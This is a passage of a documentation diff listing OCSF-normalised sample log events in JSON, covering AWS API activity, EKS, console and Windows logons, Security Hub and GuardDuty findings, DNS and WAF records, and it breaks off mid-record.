2, + "value": "205.8.181.128" + } + ], + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "205.8.181.128" + }, + "status": null, + "status_id": 99, + "time": 1695334972000, + "time_dt": "2023-09-21T22:22:52Z", + "type_name": "API Activity: Read", + "type_uid": 600302, + "unmapped": { + "eventType": "AwsApiCall", + "recipientAccountId": "1111111111111", + "requestParameters": null, + "responseElements": { + "directConnectGateways": [] + }, + "userIdentity": {} + } + } + ``` + + + +=== "test_api_activity_2" + + + ```json + { + "activity_id": 1, + "activity_name": "Create", + "actor": { + "session": { + "credential_uid": "EXAMPLEUIDTEST", + "issuer": "arn:aws:iam::123456789012:role/example-test-161366663-NodeInstanceRole-abc12345678912", + "uid": "i-12345678901" + }, + "user": { + "groups": [ + { + "name": "system:bootstrappers" + }, + { + "name": "system:nodes" + }, + { + "name": "system:authenticated" + } + ], + "name": "system:node:ip-192-001-02-03.ec2.internal", + "type_id": 0, + "uid": "heptio-authenticator-aws:123456789012:ABCD1234567890EXAMPLE" + } + }, + "api": { + "operation": "create", + "request": { + "uid": "f47c68f2-d3ac-4f96-b2f4-5d497bf79b64" + }, + "response": { + "code": 201 + }, + "version": "v1" + }, + "category_name": "Application Activity", + "category_uid": 6, + "class_name": "API Activity", + "class_uid": 6003, + "cloud": { + "account": { + "uid": "arn:aws:sts::123456789012:assumed-role/example-test-161366663-NodeInstanceRole-abc12345678912/i-12345678901" + }, + "provider": "AWS" + }, + "http_request": { + "url": { + "path": "/api/v1/nodes" + }, + "user_agent": "kubelet/v1.21.2 (linux/amd64) kubernetes/729bdfc" + }, + "message": "ResponseComplete", + "metadata": { + "log_level": "RequestResponse", + "product": { + "feature": { + "name": "Elastic Kubernetes Service" + }, + "name": "Amazon EKS", + "vendor_name": "AWS", + "version": "audit.k8s.io/v1" + }, + "profiles": [ + "cloud", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "actor.user.name", + "type": "User Name", + "type_id": 4, + "value": "system:node:ip-192-001-02-03.ec2.internal" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "12.000.22.33" + }, + { + "name": "http_request.url.path", + "type": "URL String", + "type_id": 6, + "value": "/api/v1/nodes" + } + ], + "resources": [ + { + "name": "ip-192-001-02-03.ec2.internal", + "type": "nodes" + } + ], + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "12.000.22.33" + }, + "start_time_dt": "2021-09-07 20:37:30.502000", + "time": 1631047050642, + "time_dt": "2021-09-07 20:37:30.642000", + "type_name": "API Activity: Create", + "type_uid": 600301, + "unmapped": { + "responseObject.status.capacity.cpu": "4", + "annotations.authorization.k8s.io/reason": "", + "requestObject.metadata.annotations.volumes.kubernetes.io/controller-managed-attach-detach": "true", + "responseObject.metadata.labels.kubernetes.io/hostname": "ip-192-001-02-03.ec2.internal", + "requestObject.metadata.labels.eks.amazonaws.com/sourceLaunchTemplateVersion": "1", + "responseObject.metadata.labels.alpha.eksctl.io/cluster-name": "ABCD1234567890EXAMPLE", + "responseObject.metadata.labels.eks.amazonaws.com/nodegroup-image": "ami-0193ebf9573ebc9f7", + "responseObject.metadata.managedFields[].time": "2021-09-07T20:37:30Z", + "responseObject.status.nodeInfo.kubeletVersion": "v1.21.2-eks-55daa9d", + "responseObject.status.nodeInfo.kubeProxyVersion": "v1.21.2-eks-55daa9d", + "requestObject.status.capacity.hugepages-1Gi": "0", + "responseObject.metadata.managedFields[].manager": "kubelet", + "annotations.authorization.k8s.io/decision": "allow", + "requestObject.status.nodeInfo.systemUUID": "ec2483c6-33b0-e271-f36c-e14e45a361b8", + "responseObject.metadata.name": "ip-192-001-02-03.ec2.internal", + "responseObject.metadata.labels.eks.amazonaws.com/sourceLaunchTemplateVersion": "1", + "responseObject.apiVersion": "v1", + "requestObject.metadata.labels.kubernetes.io/arch": "amd64", + "requestObject.status.allocatable.hugepages-2Mi": "0", + "requestObject.metadata.labels.alpha.eksctl.io/cluster-name": "ABCD1234567890EXAMPLE", + "responseObject.status.allocatable.memory": "15076868Ki", + "responseObject.status.conditions[].lastHeartbeatTime": "2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z", + "responseObject.spec.providerID": "aws:///us-east-1f/i-12345678901", + "requestObject.status.nodeInfo.architecture": "amd64", + "responseObject.status.nodeInfo.kernelVersion": "5.4.141-67.229.amzn2.x86_64", + "responseObject.status.allocatable.pods": "58", + "requestObject.status.conditions[].status": "False,False,False,False", + "requestObject.metadata.labels.failure-domain.beta.kubernetes.io/region": "us-east-1", + "responseObject.metadata.labels.beta.kubernetes.io/os": "linux", + "responseObject.metadata.labels.kubernetes.io/os": "linux", + "requestObject.status.addresses[].address": "192.000.22.33,12.000.22.33,ip-192-001-02-03.ec2.internal,ip-192-001-02-03.ec2.internal,ec2-12.000.22.33.compute-1.amazonaws.com", + "responseObject.status.capacity.hugepages-1Gi": "0", + "responseObject.status.conditions[].reason": "KubeletHasSufficientMemory,KubeletHasNoDiskPressure,KubeletHasSufficientPID,KubeletNotReady", + "requestObject.apiVersion": "v1", + "requestObject.status.capacity.cpu": "4", + "requestObject.metadata.labels.node.kubernetes.io/instance-type": "m5.xlarge", + "requestObject.metadata.labels.eks.amazonaws.com/nodegroup-image": "ami-0193ebf9573ebc9f7", + "responseObject.metadata.labels.node.kubernetes.io/instance-type": "m5.xlarge", + "responseObject.status.allocatable.hugepages-2Mi": "0", + "responseObject.status.allocatable.attachable-volumes-aws-ebs": "25", + "requestObject.status.nodeInfo.containerRuntimeVersion": "docker://19.3.13", + "requestObject.status.allocatable.attachable-volumes-aws-ebs": "25", + "responseObject.status.conditions[].lastTransitionTime": "2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z", + "responseObject.metadata.creationTimestamp": "2021-09-07T20:37:30Z", + "requestObject.metadata.labels.kubernetes.io/hostname": "ip-192-001-02-03.ec2.internal", + "requestObject.status.nodeInfo.bootID": "0d0dd4f2-8829-4b03-9f29-794f4908281b", + "requestObject.status.nodeInfo.kubeProxyVersion": "v1.21.2-eks-55daa9d", + "responseObject.kind": "Node", + "requestObject.status.nodeInfo.osImage": "Amazon Linux 2", + "requestObject.status.conditions[].type": "MemoryPressure,DiskPressure,PIDPressure,Ready", + "requestObject.status.daemonEndpoints.kubeletEndpoint.Port": "10250", + "responseObject.metadata.labels.kubernetes.io/arch": "amd64", + "responseObject.metadata.labels.eks.amazonaws.com/sourceLaunchTemplateId": "lt-0f20d6f901007611e", + "requestObject.status.capacity.attachable-volumes-aws-ebs": "25", + "responseObject.status.conditions[].message": "kubelet has sufficient memory available,kubelet has no disk pressure,kubelet has sufficient PID available,[container runtime status check may not have completed yet, container runtime network not ready: NetworkReady=false reason:NetworkPluginNotReady message:docker: network plugin is not ready: cni config uninitialized, CSINode is not yet initialized, missing node capacity for resources: ephemeral-storage]", + "responseObject.status.nodeInfo.operatingSystem": "linux", + "requestObject.metadata.labels.alpha.eksctl.io/nodegroup-name": "ng-5fe434eb", + "responseObject.status.capacity.memory": "16093700Ki", + "requestObject.metadata.labels.beta.kubernetes.io/arch": "amd64", + "requestObject.metadata.labels.eks.amazonaws.com/capacityType": "ON_DEMAND", + "requestObject.status.allocatable.memory": "15076868Ki", + "requestObject.status.conditions[].lastHeartbeatTime": "2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z", + "responseObject.status.capacity.attachable-volumes-aws-ebs": "25", + "responseObject.status.nodeInfo.osImage": "Amazon Linux 2", + "responseObject.metadata.labels.beta.kubernetes.io/instance-type": "m5.xlarge", + "responseObject.metadata.labels.alpha.eksctl.io/nodegroup-name": "ng-5fe434eb", + "requestObject.metadata.labels.beta.kubernetes.io/instance-type": "m5.xlarge", + "responseObject.status.nodeInfo.architecture": "amd64", + "responseObject.metadata.labels.topology.kubernetes.io/zone": "us-east-1f", + "requestObject.status.capacity.hugepages-2Mi": "0", + "requestObject.status.conditions[].message": "kubelet has sufficient memory available,kubelet has no disk pressure,kubelet has sufficient PID available,[container runtime status check may not have completed yet, container runtime network not ready: NetworkReady=false reason:NetworkPluginNotReady message:docker: network plugin is not ready: cni config uninitialized, CSINode is not yet initialized, missing node capacity for resources: ephemeral-storage]", + "responseObject.metadata.labels.failure-domain.beta.kubernetes.io/region": "us-east-1", + "requestObject.metadata.labels.eks.amazonaws.com/sourceLaunchTemplateId": "lt-0f20d6f901007611e", + "responseObject.spec.taints[].effect": "NoSchedule", + "requestObject.metadata.labels.topology.kubernetes.io/region": "us-east-1", + "requestObject.metadata.name": "ip-192-001-02-03.ec2.internal", + "responseObject.status.nodeInfo.machineID": "ec2483c633b0e271f36ce14e45a361b8", + "kind": "Event", + "responseObject.metadata.annotations.volumes.kubernetes.io/controller-managed-attach-detach": "true", + "responseObject.status.nodeInfo.bootID": "0d0dd4f2-8829-4b03-9f29-794f4908281b", + "responseObject.status.conditions[].status": "False,False,False,False", + "requestObject.metadata.labels.beta.kubernetes.io/os": "linux", + "requestObject.status.allocatable.hugepages-1Gi": "0", + "requestObject.status.addresses[].type": "InternalIP,ExternalIP,Hostname,InternalDNS,ExternalDNS", + "requestObject.metadata.labels.failure-domain.beta.kubernetes.io/zone": "us-east-1f", + "requestObject.status.allocatable.cpu": "3920m", + "requestObject.metadata.labels.kubernetes.io/os": "linux", + "requestObject.status.nodeInfo.operatingSystem": "linux", + "responseObject.status.daemonEndpoints.kubeletEndpoint.Port": "10250", + "responseObject.status.nodeInfo.systemUUID": "ec2483c6-33b0-e271-f36c-e14e45a361b8", + "responseObject.metadata.labels.failure-domain.beta.kubernetes.io/zone": "us-east-1f", + "requestObject.metadata.labels.topology.kubernetes.io/zone": "us-east-1f", + "responseObject.status.nodeInfo.containerRuntimeVersion": "docker://19.3.13", + "requestObject.status.nodeInfo.kernelVersion": "5.4.141-67.229.amzn2.x86_64", + "requestObject.kind": "Node", + "requestObject.spec.providerID": "aws:///us-east-1f/i-12345678901", + "responseObject.metadata.uid": "4ecf628a-1b50-47ed-932c-bb1df89dad10", + "responseObject.status.capacity.hugepages-2Mi": "0", + "responseObject.metadata.managedFields[].fieldsType": "FieldsV1", + "responseObject.metadata.labels.topology.kubernetes.io/region": "us-east-1", + "responseObject.status.capacity.pods": "58", + "requestObject.status.capacity.memory": "16093700Ki", + "responseObject.metadata.managedFields[].apiVersion": "v1", + "responseObject.status.allocatable.hugepages-1Gi": "0", + "responseObject.metadata.resourceVersion": "67933403", + "responseObject.status.addresses[].address": "192.000.22.33,12.000.22.33,ip-192-001-02-03.ec2.internal,ip-192-001-02-03.ec2.internal,ec2-12.000.22.33.compute-1.amazonaws.com", + "requestObject.status.conditions[].lastTransitionTime": "2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z", + "requestObject.status.nodeInfo.kubeletVersion": "v1.21.2-eks-55daa9d", + "responseObject.metadata.labels.eks.amazonaws.com/nodegroup": "ng-5fe434eb", + "requestObject.metadata.labels.eks.amazonaws.com/nodegroup": "ng-5fe434eb", + "requestObject.status.conditions[].reason": "KubeletHasSufficientMemory,KubeletHasNoDiskPressure,KubeletHasSufficientPID,KubeletNotReady", + "responseObject.metadata.labels.eks.amazonaws.com/capacityType": "ON_DEMAND", + "requestObject.status.nodeInfo.machineID": "ec2483c633b0e271f36ce14e45a361b8", + "responseObject.status.addresses[].type": "InternalIP,ExternalIP,Hostname,InternalDNS,ExternalDNS", + "responseObject.metadata.labels.beta.kubernetes.io/arch": "amd64", + "responseObject.metadata.managedFields[].operation": "Update", + "responseObject.status.allocatable.cpu": "3920m", + "responseObject.status.conditions[].type": "MemoryPressure,DiskPressure,PIDPressure,Ready", + "responseObject.spec.taints[].key": "node.kubernetes.io/not-ready", + "sourceIPs[]": "12.000.22.33", + "requestObject.status.capacity.pods": "58", + "requestObject.status.allocatable.pods": "58" + } + } + ``` + + + +=== "test_authentication_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Logon", + "actor": { + "idp": { + "name": null + }, + "invoked_by": null, + "session": { + "issuer": null + }, + "user": { + "account": { + "uid": "111122223333" + }, + "credential_uid": null, + "name": "anaya", + "type": "IAMUser", + "uid": "arn:aws:iam::111122223333:user/anaya", + "uid_alt": "AIDACKCEVSQ6C2EXAMPLE" + } + }, + "api": { + "operation": "ConsoleLogin", + "request": { + "data": null, + "uid": "" + }, + "response": { + "data": { + "ConsoleLogin": "Success" + }, + "error": null, + "message": null + }, + "service": { + "name": "signin.amazonaws.com" + }, + "version": null + }, + "category_name": "Identity & Access Management Category", + "category_uid": 3, + "class_name": "Authentication", + "class_uid": 3002, + "cloud": { + "provider": "AWS", + "region": "us-east-1" + }, + "dst_endpoint": { + "svc_name": "https://console.aws.amazon.com/console/home?state=hashArgs%23&isauthcode=true" + }, + "http_request": { + "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" + }, + "is_mfa": true, + "metadata": { + "event_code": "AwsConsoleSignIn", + "log_provider": "CloudTrail", + "product": { + "feature": { + "name": "Management" + }, + "name": "CloudTrail", + "vendor_name": "AWS", + "version": "1.08" + }, + "profiles": [ + "cloud", + "datetime" + ], + "uid": "fed06f42-cb12-4764-8c69-example", + "version": "1.1.0" + }, + "observables": [ + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "192.0.2.0" + } + ], + "session": { + "expiration_time": null + }, + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "192.0.2.0" + }, + "status": "Success", + "status_id": 1, + "time": 1699633474000, + "time_dt": "2023-11-10T16:24:34Z", + "type_name": "Authentication: Logon", + "type_uid": 300201, + "unmapped": { + "additionalEventData": { + "LoginTo": "https://console.aws.amazon.com/console/home?state=hashArgs%23&isauthcode=true", + "MFAIdentifier": "arn:aws:iam::111122223333:u2f/user/anaya/default-AAAAAAAABBBBBBBBCCCCCCCCDD", + "MobileVersion": "No" + }, + "eventType": "AwsConsoleSignIn", + "recipientAccountId": "111122223333", + "requestParameters": null, + "responseElements": {}, + "userIdentity": {} + }, + "user": { + "uid": "arn:aws:iam::111122223333:user/anaya", + "uid_alt": "AIDACKCEVSQ6C2EXAMPLE" + } + } + ``` + + + +=== "test_authentication_2" + + + ```json + { + "activity_id": 1, + "activity_name": "Logon", + "actor": { + "process": { + "file": { + "name": "services.exe", + "parent_folder": "C:\\Windows\\System32", + "path": "C:\\Windows\\System32\\services.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 848 + }, + "session": { + "uid": "0x3E7" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "ATTACKRANGE", + "name": "WIN-DC-725$", + "uid": "NT AUTHORITY\\SYSTEM" + } + }, + "auth_protocol": "Other", + "auth_protocol_id": 99, + "category_name": "Audit Activity", + "category_uid": 3, + "class_name": "Authentication", + "class_uid": 3002, + "device": { + "hostname": "win-dc-725.attackrange.local", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "dst_endpoint": { + "hostname": "win-dc-725.attackrange.local" + }, + "logon_process": { + "name": "Advapi ", + "pid": -1 + }, + "logon_type": "OS Service", + "logon_type_id": 5, + "message": "An account was successfully logged on.", + "metadata": { + "original_time": "03/12/2021 10:48:14 AM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "ce139867-ced1-4742-9bb0-ad1926b8bbe1", + "version": "1.0.0-rc.2" + }, + "session": { + "uid": "0x3E7", + "uuid": "{00000000-0000-0000-0000-000000000000}" + }, + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "-", + "name": "-", + "port": 0 + }, + "status": "Success", + "status_id": 1, + "time": 1615564094000, + "type_name": "Authentication: Logon", + "type_uid": 300201, + "unmapped": { + "Detailed Authentication Information": { + "Key Length": "0", + "Package Name (NTLM only)": "-", + "Transited Services": "-" + }, + "EventCode": "4624", + "EventType": "0", + "Impersonation Level": "Impersonation", + "Logon Information": { + "Elevated Token": "Yes", + "Restricted Admin Mode": "-", + "Virtual Account": "No" + }, + "New Logon": { + "Linked Logon ID": "0x0", + "Network Account Domain": "-", + "Network Account Name": "-" + }, + "OpCode": "Info", + "RecordNumber": "257879", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Logon" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "NT AUTHORITY", + "name": "SYSTEM", + "uid": "NT AUTHORITY\\SYSTEM" + } + } + ``` + + + +=== "test_authentication_3" + + + ```json + { + "activity_id": 1, + "activity_name": "Logon", + "actor": { + "process": { + "file": { + "name": "-", + "path": "-", + "type": "Regular File", + "type_id": 1 + }, + "pid": 0 + }, + "session": { + "uid": "0x0" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "-", + "name": "-", + "uid": "NULL SID" + } + }, + "auth_protocol": "NTLM", + "auth_protocol_id": 1, + "category_name": "Audit Activity", + "category_uid": 3, + "class_name": "Authentication", + "class_uid": 3002, + "device": { + "hostname": "EC2AMAZ-6KJ2BPP", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "dst_endpoint": { + "hostname": "EC2AMAZ-6KJ2BPP" + }, + "logon_process": { + "name": "NtLmSsp ", + "pid": -1 + }, + "logon_type": "Network", + "logon_type_id": 3, + "message": "An account failed to log on.", + "metadata": { + "original_time": "10/08/2020 12:41:47 PM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "a738d6e6-4ebd-49bb-805e-45d0604a1bef", + "version": "1.0.0-rc.2" + }, + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "-", + "name": "EC2AMAZ-6KJ2BPP", + "port": 0 + }, + "status": "0xC000006D", + "status_detail": "Unknown user name or bad password.", + "status_id": 2, + "time": 1602175307000, + "type_name": "Authentication: Logon", + "type_uid": 300201, + "unmapped": { + "Detailed Authentication Information": { + "Key Length": "0", + "Package Name (NTLM only)": "-", + "Transited Services": "-" + }, + "EventCode": "4625", + "EventType": "0", + "Failure Information": { + "Sub Status": "0xC000006A" + }, + "OpCode": "Info", + "RecordNumber": "223742", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Logon" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "EC2AMAZ-6KJ2BPP", + "name": "Administrator", + "uid": "NULL SID" + } + } + ``` + + + +=== "test_compliance_finding_1" + + + ```json + { + "activity_id": 2, + "activity_name": "Update", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Compliance Finding", + "class_uid": 2003, + "cloud": { + "account": { + "uid": "111111111111" + }, + "provider": "AWS", + "region": "us-east-2" + }, + "compliance": { + "control": "Config.1", + "requirements": [ + "PCI DSS 10.5.2", + "PCI DSS 11.5" + ], + "standards": [ + "standards/pci-dss/v/3.2.1" + ], + "status": "FAILED" + }, + "finding_info": { + "created_time_dt": "2023-01-13T15:08:44.967-05:00", + "desc": "This AWS control checks whether AWS Config is enabled in current account and region.", + "first_seen_time_dt": "2023-01-13T15:08:44.967-05:00", + "last_seen_time_dt": "2023-07-21T14:12:05.693-04:00", + "modified_time_dt": "2023-07-21T14:11:53.060-04:00", + "title": "PCI.Config.1 AWS Config should be enabled", + "types": [ + "Software and Configuration Checks/Industry and Regulatory Standards/PCI-DSS" + ], + "uid": "arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1/PCI.Config.1/finding/7d619054-6f0d-456b-aa75-23b20f74fae6" + }, + "metadata": { + "log_version": "2018-10-08", + "processed_time_dt": "2023-07-21T14:12:08.489-04:00", + "product": { + "feature": { + "uid": "pci-dss/v/3.2.1/PCI.Config.1" + }, + "name": "Security Hub", + "uid": "arn:aws:securityhub:us-east-2::product/aws/securityhub", + "vendor_name": "AWS" + }, + "profiles": [ + "cloud", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "resource.uid", + "type": "Resource UID", + "type_id": 10, + "value": "AWS::::Account:111111111111" + } + ], + "remediation": { + "desc": "For information on how to correct this issue, consult the AWS Security Hub controls documentation.", + "references": [ + "https://docs.aws.amazon.com/console/securityhub/Config.1/remediation" + ] + }, + "resource": { + "cloud_partition": "aws", + "region": "us-east-2", + "type": "AwsAccount", + "uid": "AWS::::Account:111111111111" + }, + "severity": "Medium", + "severity_id": 3, + "status": "New", + "time": 1689963113060, + "time_dt": "2023-07-21T14:11:53.060-04:00", + "type_name": "Compliance Finding: Update", + "type_uid": 200302, + "unmapped": { + "FindingProviderFields.Severity.Label": "MEDIUM", + "FindingProviderFields.Severity.Original": "MEDIUM", + "FindingProviderFields.Types[]": "Software and Configuration Checks/Industry and Regulatory Standards/PCI-DSS", + "ProductFields.ControlId": "PCI.Config.1", + "ProductFields.RecommendationUrl": "https://docs.aws.amazon.com/console/securityhub/Config.1/remediation", + "ProductFields.Resources:0/Id": "arn:aws:iam::111111111111:root", + "ProductFields.StandardsArn": "arn:aws:securityhub:::standards/pci-dss/v/3.2.1", + "ProductFields.StandardsControlArn": "arn:aws:securityhub:us-east-2:111111111111:control/pci-dss/v/3.2.1/PCI.Config.1", + "ProductFields.StandardsSubscriptionArn": "arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1", + "ProductFields.aws/securityhub/CompanyName": "AWS", + "ProductFields.aws/securityhub/FindingId": "arn:aws:securityhub:us-east-2::product/aws/securityhub/arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1/PCI.Config.1/finding/7d619054-6f0d-456b-aa75-23b20f74fae6", + "ProductFields.aws/securityhub/ProductName": "Security Hub", + "RecordState": "ACTIVE", + "Severity.Normalized": "40", + "Severity.Original": "MEDIUM", + "Severity.Product": "40", + "WorkflowState": "NEW" + } + } + ``` + + + +=== "test_detection_finding_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Create", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "cloud": { + "account": { + "uid": "111111111111" + }, + "provider": "AWS", + "region": "us-east-2" + }, + "evidences": [ + { + "api": { + "operation": "DeleteTrail", + "service": { + "name": "cloudtrail.amazonaws.com" + } + }, + "data": "", + "src_endpoint": { + "ip": "52.94.133.131", + "location": { + "city": "", + "coordinates": [ + -100.821999, + 37.751 + ], + "country": "United States" + } + } + } + ], + "finding_info": { + "created_time_dt": "2023-09-19T11:05:22.487-04:00", + "desc": "AWS CloudTrail trail arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me was disabled by Admin calling DeleteTrail under unusual circumstances. This can be attackers attempt to cover their tracks by eliminating any trace of activity performed while they accessed your account.", + "first_seen_time_dt": "2023-09-19T10:55:09.000-04:00", + "last_seen_time_dt": "2023-09-19T10:55:09.000-04:00", + "modified_time_dt": "2023-09-19T11:05:22.487-04:00", + "src_url": "https://us-east-2.console.aws.amazon.com/guardduty/home?region=us-east-2#/findings?macros=current&fId=a6c556fcbc9bea427a19f8b787099a0b", + "title": "AWS CloudTrail trail arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me was disabled.", + "types": [ + "TTPs/Defense Evasion/Stealth:IAMUser-CloudTrailLoggingDisabled" + ], + "uid": "arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE/finding/a6c556fcbc9bea427a19f8b787099a0b" + }, + "metadata": { + "extensions": [ + { + "name": "linux", + "uid": "1", + "version": "1.1.0" + } + ], + "log_version": "2018-10-08", + "product": { + "feature": { + "uid": "arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE" + }, + "name": "GuardDuty", + "uid": "arn:aws:securityhub:us-east-2::product/aws/guardduty", + "vendor_name": "Amazon" + }, + "profiles": [ + "cloud", + "datetime", + "linux" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "evidences[].src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "52.94.133.131" + }, + { + "name": "resources[].uid", + "type": "Resource UID", + "type_id": 10, + "value": "AWS::IAM::AccessKey:ASIATMJPC7EXAMPLE" + } + ], + "resources": [ + { + "cloud_partition": "aws", + "data": "{\"AwsIamAccessKey\":{\"PrincipalId\":\"AROATMJPC7YEXAMPLE:example\",\"PrincipalName\":\"Admin\",\"PrincipalType\":\"AssumedRole\"}}", + "region": "us-east-2", + "type": "AwsIamAccessKey", + "uid": "AWS::IAM::AccessKey:ASIATMJPC7EXAMPLE" + } + ], + "severity": "Low", + "severity_id": 2, + "status": "New", + "time": 1695135922487, + "time_dt": "2023-09-19T11:05:22.487-04:00", + "type_name": "Detection Finding: Create", + "type_uid": 200401, + "unmapped": { + "FindingProviderFields.Severity.Label": "LOW", + "FindingProviderFields.Types[]": "TTPs/Defense Evasion/Stealth:IAMUser-CloudTrailLoggingDisabled", + "ProductFields.aws/guardduty/service/action/actionType": "AWS_API_CALL", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::CloudTrail::Trail": "arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType": "Remote IP", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn": "16509", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg": "AMAZON-02", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp": "Amazon Office", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org": "Amazon Office", + "ProductFields.aws/guardduty/service/additionalInfo/type": "default", + "ProductFields.aws/guardduty/service/archived": "false", + "ProductFields.aws/guardduty/service/count": "1", + "ProductFields.aws/guardduty/service/detectorId": "1ac1bfceda6679698215d5d0EXAMPLE", + "ProductFields.aws/guardduty/service/eventFirstSeen": "2023-09-19T14:55:09.000Z", + "ProductFields.aws/guardduty/service/eventLastSeen": "2023-09-19T14:55:09.000Z", + "ProductFields.aws/guardduty/service/resourceRole": "TARGET", + "ProductFields.aws/guardduty/service/serviceName": "guardduty", + "ProductFields.aws/securityhub/CompanyName": "Amazon", + "ProductFields.aws/securityhub/FindingId": "arn:aws:securityhub:us-east-2::product/aws/guardduty/arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE/finding/a6c556fcbc9bea427a19f8b787099a0b", + "ProductFields.aws/securityhub/ProductName": "GuardDuty", + "RecordState": "ACTIVE", + "Sample": "false", + "Severity.Normalized": "40", + "Severity.Product": "2", + "WorkflowState": "NEW" + } + } + ``` + + + +=== "test_dns_activity_1" + + + ```json + { + "action": "Allowed", + "action_id": 1, + "activity_id": 6, + "activity_name": "Traffic", + "answers": [ + { + "class": "IN", + "rdata": "127.0.0.62", + "type": "A" + } + ], + "category_name": "Network Activity", + "category_uid": 4, + "class_name": "DNS Activity", + "class_uid": 4003, + "cloud": { + "account": { + "uid": "123456789012" + }, + "provider": "AWS", + "region": "us-east-1" + }, + "connection_info": { + "direction": "Unknown", + "direction_id": 0, + "protocol_name": "UDP" + }, + "disposition": "Alert", + "dst_endpoint": { + "instance_uid": "rslvr-in-0000000000000000", + "interface_uid": "rni-0000000000000000" + }, + "firewall_rule": { + "uid": "rslvr-frg-000000000000000" + }, + "metadata": { + "product": { + "feature": { + "name": "Resolver Query Logs" + }, + "name": "Route 53", + "vendor_name": "AWS", + "version": "1.100000" + }, + "profiles": [ + "cloud", + "security_control", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "answers[].rdata", + "type": "IP Address", + "type_id": 2, + "value": "127.0.0.62" + }, + { + "name": "dst_endpoint.instance_uid", + "type": "Resource UID", + "type_id": 10, + "value": "rslvr-in-0000000000000000" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "10.200.21.100" + }, + { + "name": "query.hostname", + "type": "Hostname", + "type_id": 1, + "value": "ip-127-0-0-62.alert.firewall.canary." + } + ], + "query": { + "class": "IN", + "hostname": "ip-127-0-0-62.alert.firewall.canary.", + "type": "A" + }, + "rcode": "NoError", + "rcode_id": 0, + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "10.200.21.100", + "port": 15083, + "vpc_uid": "vpc-00000000000000000" + }, + "time": 1665694956000, + "time_dt": "2022-10-13T17:02:36.000-04:00", + "type_name": "DNS Activity: Traffic", + "type_uid": 400306, + "unmapped": { + "firewall_domain_list_id": "rslvr-fdl-0000000000000" + } + } + ``` + + + +=== "test_http_activity_1" + + + ```json + { + "activity_id": 3, + "activity_name": "Get", + "category_name": "Network Activitys", + "category_uid": 4, + "class_name": "HTTP Activity", + "class_uid": 4002, + "cloud": { + "provider": "AWS" + }, + "dst_endpoint": { + "domain": "/CanaryTest" + }, + "firewall_rule": { + "type": "RATE_BASED", + "uid": "RateBasedRule" + }, + "http_request": { + "args": "", + "http_method": "GET", + "uid": "Ed0AiHF_CGYF-DA=", + "url": { + "path": "/CanaryTest" + }, + "version": "HTTP/1.1" + }, + "http_response": { + "code": 403 + }, + "metadata": { + "labels": null, + "product": { + "feature": { + "uid": "..." + }, + "name": "AWS WAF", + "vendor_name": "AWS", + "version": "1" + }, + "version": "1.1.0-dev" + }, + "severity_id": 1, + "src_endpoint": { + "ip": "52.46.82.45", + "location": { + "country": 